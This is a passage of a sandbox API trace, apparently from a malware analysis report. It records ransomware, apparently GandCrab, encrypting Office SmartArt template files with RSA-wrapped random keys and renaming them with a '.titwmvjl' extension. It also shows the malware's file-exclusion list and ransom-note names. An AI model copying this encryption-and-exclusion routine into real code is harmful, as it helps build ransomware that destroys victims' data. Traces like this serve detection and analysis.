dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ec [0078.953] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.953] ReadFile (in: hFile=0x2ec, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259dfd0, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259dfd0*=0x21c, lpOverlapped=0x0) returned 1 [0078.955] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.955] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.955] CryptAcquireContextW (in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259df00*=0x4cdb38) returned 1 [0078.959] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2650000 [0078.960] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0078.960] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0078.960] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259df8c | out: pbBuffer=0x259df8c) returned 1 [0078.960] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.960] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0078.960] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.960] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.961] CryptAcquireContextW (in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259df00*=0x4cdb38) returned 1 [0078.964] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2650000 [0078.965] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0078.965] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0078.965] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259dfac | out: pbBuffer=0x259dfac) returned 1 [0078.965] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.965] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0078.965] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.965] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.966] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4cdb38) returned 1 [0078.969] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.969] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x5032f8) returned 1 [0078.970] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.970] CryptGetKeyParam (in: hKey=0x5032f8, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0078.970] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.970] CryptEncrypt (in: hKey=0x5032f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259df24*=0x100) returned 1 [0078.970] GetLastError () returned 0x0 [0078.970] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.971] CryptDestroyKey (hKey=0x5032f8) returned 1 [0078.971] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.971] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0078.971] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.971] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4cdb38) returned 1 [0078.975] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.976] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x5037b8) returned 1 [0078.976] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.976] CryptGetKeyParam (in: hKey=0x5037b8, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0078.976] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.976] CryptEncrypt (in: hKey=0x5037b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259df24*=0x100) returned 1 [0078.976] GetLastError () returned 0x0 [0078.976] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.977] CryptDestroyKey (hKey=0x5037b8) returned 1 [0078.977] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.977] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0078.977] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0078.977] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0078.977] ReadFile (in: hFile=0x2ec, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259dfd0, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259dfd0*=0x1831, lpOverlapped=0x0) returned 1 [0078.994] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0xffffe7cf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.995] WriteFile (in: hFile=0x2ec, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x1831, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259dfb4*=0x1831, lpOverlapped=0x0) returned 1 [0078.996] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.996] WriteFile (in: hFile=0x2ec, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259dfb4*=0x21c, lpOverlapped=0x0) returned 1 [0078.998] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.001] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.001] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.001] CloseHandle (hObject=0x2ec) returned 1 [0079.004] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328986[[fn=Theme Picture Grid]].glox" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328986[[fn=theme picture grid]].glox"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328986[[fn=Theme Picture Grid]].glox.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328986[[fn=theme picture grid]].glox.titwmvjl"), dwFlags=0x1) returned 1 [0079.004] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.004] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259e084 | out: lpFindFileData=0x259e084) returned 1 [0079.005] lstrcmpW (lpString1="TM03328990[[fn=Varying Width List]].glox", lpString2=".") returned 1 [0079.005] lstrcmpW (lpString1="TM03328990[[fn=Varying Width List]].glox", lpString2="..") returned 1 [0079.005] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\", lpString2="TM03328990[[fn=Varying Width List]].glox" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328990[[fn=Varying Width List]].glox") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328990[[fn=Varying Width List]].glox" [0079.005] lstrlenW (lpString=".titwmvjl") returned 9 [0079.005] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328990[[fn=Varying Width List]].glox") returned 144 [0079.005] VirtualAlloc (lpAddress=0x0, dwSize=0x160, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0079.005] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328990[[fn=Varying Width List]].glox.titwmvjl") returned 153 [0079.005] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328990[[fn=Varying Width List]].glox") returned 144 [0079.005] lstrlenW (lpString=".glox") returned 5 [0079.005] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0079.005] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".glox ") returned 6 [0079.005] lstrcmpiW (lpString1=".glox", lpString2=".titwmvjl") returned -1 [0079.005] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.006] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328990[[fn=Varying Width List]].glox") returned 144 [0079.006] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328990[[fn=Varying Width List]].glox") returned 144 [0079.006] lstrcmpiW (lpString1="TM03328990[[fn=Varying Width List]].glox", lpString2="desktop.ini") returned 1 [0079.006] lstrcmpiW (lpString1="TM03328990[[fn=Varying Width List]].glox", lpString2="autorun.inf") returned 1 [0079.006] lstrcmpiW (lpString1="TM03328990[[fn=Varying Width List]].glox", lpString2="ntuser.dat") returned 1 [0079.006] lstrcmpiW (lpString1="TM03328990[[fn=Varying Width List]].glox", lpString2="iconcache.db") returned 1 [0079.006] lstrcmpiW (lpString1="TM03328990[[fn=Varying Width List]].glox", lpString2="bootsect.bak") returned 1 [0079.006] lstrcmpiW (lpString1="TM03328990[[fn=Varying Width List]].glox", lpString2="boot.ini") returned 1 [0079.006] lstrcmpiW (lpString1="TM03328990[[fn=Varying Width List]].glox", lpString2="ntuser.dat.log") returned 1 [0079.006] lstrcmpiW (lpString1="TM03328990[[fn=Varying Width List]].glox", lpString2="thumbs.db") returned 1 [0079.006] lstrcmpiW (lpString1="TM03328990[[fn=Varying Width List]].glox", lpString2="TITWMVJL-DECRYPT.txt") returned 1 [0079.006] lstrcmpiW (lpString1="TM03328990[[fn=Varying Width List]].glox", lpString2="TITWMVJL-DECRYPT.html") returned 1 [0079.006] lstrcmpiW (lpString1="TM03328990[[fn=Varying Width List]].glox", lpString2="KRAB-DECRYPT.html") returned 1 [0079.006] lstrcmpiW (lpString1="TM03328990[[fn=Varying Width List]].glox", lpString2="CRAB-DECRYPT.html") returned 1 [0079.006] lstrcmpiW (lpString1="TM03328990[[fn=Varying Width List]].glox", lpString2="KRAB-DECRYPT.txt") returned 1 [0079.006] lstrcmpiW (lpString1="TM03328990[[fn=Varying Width List]].glox", lpString2="CRAB-DECRYPT.txt") returned 1 [0079.006] lstrcmpiW (lpString1="TM03328990[[fn=Varying Width List]].glox", lpString2="ntldr") returned 1 [0079.006] lstrcmpiW (lpString1="TM03328990[[fn=Varying Width List]].glox", lpString2="NTDETECT.COM") returned 1 [0079.006] lstrcmpiW (lpString1="TM03328990[[fn=Varying Width List]].glox", lpString2="Bootfont.bin") returned 1 [0079.006] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328990[[fn=Varying Width List]].glox") returned 144 [0079.006] lstrlenW (lpString=".glox") returned 5 [0079.006] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0079.006] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".glox ") returned 6 [0079.006] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.006] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0079.007] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328990[[fn=Varying Width List]].glox" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328990[[fn=varying width list]].glox"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ec [0079.007] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.007] ReadFile (in: hFile=0x2ec, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259dfd0, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259dfd0*=0x21c, lpOverlapped=0x0) returned 1 [0079.023] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.023] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.023] CryptAcquireContextW (in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259df00*=0x4cdb38) returned 1 [0079.026] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2650000 [0079.026] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0079.026] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0079.026] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259df8c | out: pbBuffer=0x259df8c) returned 1 [0079.026] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.026] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0079.026] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.027] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.027] CryptAcquireContextW (in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259df00*=0x4cdb38) returned 1 [0079.029] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2650000 [0079.030] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0079.030] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0079.030] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259dfac | out: pbBuffer=0x259dfac) returned 1 [0079.030] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.030] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0079.030] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.030] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.031] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4cdb38) returned 1 [0079.033] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.033] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x5035b8) returned 1 [0079.033] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.034] CryptGetKeyParam (in: hKey=0x5035b8, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0079.034] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.034] CryptEncrypt (in: hKey=0x5035b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259df24*=0x100) returned 1 [0079.034] GetLastError () returned 0x0 [0079.034] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.034] CryptDestroyKey (hKey=0x5035b8) returned 1 [0079.034] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.034] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0079.034] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.035] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4cdb38) returned 1 [0079.037] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.038] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x5035b8) returned 1 [0079.038] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.038] CryptGetKeyParam (in: hKey=0x5035b8, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0079.038] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.038] CryptEncrypt (in: hKey=0x5035b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259df24*=0x100) returned 1 [0079.038] GetLastError () returned 0x0 [0079.038] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.038] CryptDestroyKey (hKey=0x5035b8) returned 1 [0079.038] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.038] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0079.039] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0079.039] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0079.039] ReadFile (in: hFile=0x2ec, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259dfd0, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259dfd0*=0xc03, lpOverlapped=0x0) returned 1 [0079.050] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0xfffff3fd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.050] WriteFile (in: hFile=0x2ec, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xc03, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259dfb4*=0xc03, lpOverlapped=0x0) returned 1 [0079.052] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.052] WriteFile (in: hFile=0x2ec, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259dfb4*=0x21c, lpOverlapped=0x0) returned 1 [0079.053] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.057] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.058] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.058] CloseHandle (hObject=0x2ec) returned 1 [0079.060] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328990[[fn=Varying Width List]].glox" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328990[[fn=varying width list]].glox"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328990[[fn=Varying Width List]].glox.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328990[[fn=varying width list]].glox.titwmvjl"), dwFlags=0x1) returned 1 [0079.060] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.061] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259e084 | out: lpFindFileData=0x259e084) returned 1 [0079.061] lstrcmpW (lpString1="TM03328998[[fn=Rings]].glox", lpString2=".") returned 1 [0079.061] lstrcmpW (lpString1="TM03328998[[fn=Rings]].glox", lpString2="..") returned 1 [0079.061] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\", lpString2="TM03328998[[fn=Rings]].glox" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328998[[fn=Rings]].glox") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328998[[fn=Rings]].glox" [0079.061] lstrlenW (lpString=".titwmvjl") returned 9 [0079.061] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328998[[fn=Rings]].glox") returned 131 [0079.061] VirtualAlloc (lpAddress=0x0, dwSize=0x146, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0079.061] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328998[[fn=Rings]].glox.titwmvjl") returned 140 [0079.061] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328998[[fn=Rings]].glox") returned 131 [0079.061] lstrlenW (lpString=".glox") returned 5 [0079.061] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0079.061] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".glox ") returned 6 [0079.061] lstrcmpiW (lpString1=".glox", lpString2=".titwmvjl") returned -1 [0079.061] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.062] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328998[[fn=Rings]].glox") returned 131 [0079.062] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328998[[fn=Rings]].glox") returned 131 [0079.062] lstrcmpiW (lpString1="TM03328998[[fn=Rings]].glox", lpString2="desktop.ini") returned 1 [0079.062] lstrcmpiW (lpString1="TM03328998[[fn=Rings]].glox", lpString2="autorun.inf") returned 1 [0079.062] lstrcmpiW (lpString1="TM03328998[[fn=Rings]].glox", lpString2="ntuser.dat") returned 1 [0079.062] lstrcmpiW (lpString1="TM03328998[[fn=Rings]].glox", lpString2="iconcache.db") returned 1 [0079.062] lstrcmpiW (lpString1="TM03328998[[fn=Rings]].glox", lpString2="bootsect.bak") returned 1 [0079.062] lstrcmpiW (lpString1="TM03328998[[fn=Rings]].glox", lpString2="boot.ini") returned 1 [0079.062] lstrcmpiW (lpString1="TM03328998[[fn=Rings]].glox", lpString2="ntuser.dat.log") returned 1 [0079.062] lstrcmpiW (lpString1="TM03328998[[fn=Rings]].glox", lpString2="thumbs.db") returned 1 [0079.062] lstrcmpiW (lpString1="TM03328998[[fn=Rings]].glox", lpString2="TITWMVJL-DECRYPT.txt") returned 1 [0079.062] lstrcmpiW (lpString1="TM03328998[[fn=Rings]].glox", lpString2="TITWMVJL-DECRYPT.html") returned 1 [0079.062] lstrcmpiW (lpString1="TM03328998[[fn=Rings]].glox", lpString2="KRAB-DECRYPT.html") returned 1 [0079.062] lstrcmpiW (lpString1="TM03328998[[fn=Rings]].glox", lpString2="CRAB-DECRYPT.html") returned 1 [0079.062] lstrcmpiW (lpString1="TM03328998[[fn=Rings]].glox", lpString2="KRAB-DECRYPT.txt") returned 1 [0079.062] lstrcmpiW (lpString1="TM03328998[[fn=Rings]].glox", lpString2="CRAB-DECRYPT.txt") returned 1 [0079.062] lstrcmpiW (lpString1="TM03328998[[fn=Rings]].glox", lpString2="ntldr") returned 1 [0079.062] lstrcmpiW (lpString1="TM03328998[[fn=Rings]].glox", lpString2="NTDETECT.COM") returned 1 [0079.062] lstrcmpiW (lpString1="TM03328998[[fn=Rings]].glox", lpString2="Bootfont.bin") returned 1 [0079.062] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328998[[fn=Rings]].glox") returned 131 [0079.062] lstrlenW (lpString=".glox") returned 5 [0079.062] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0079.062] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".glox ") returned 6 [0079.062] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.062] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0079.063] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328998[[fn=Rings]].glox" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328998[[fn=rings]].glox"), 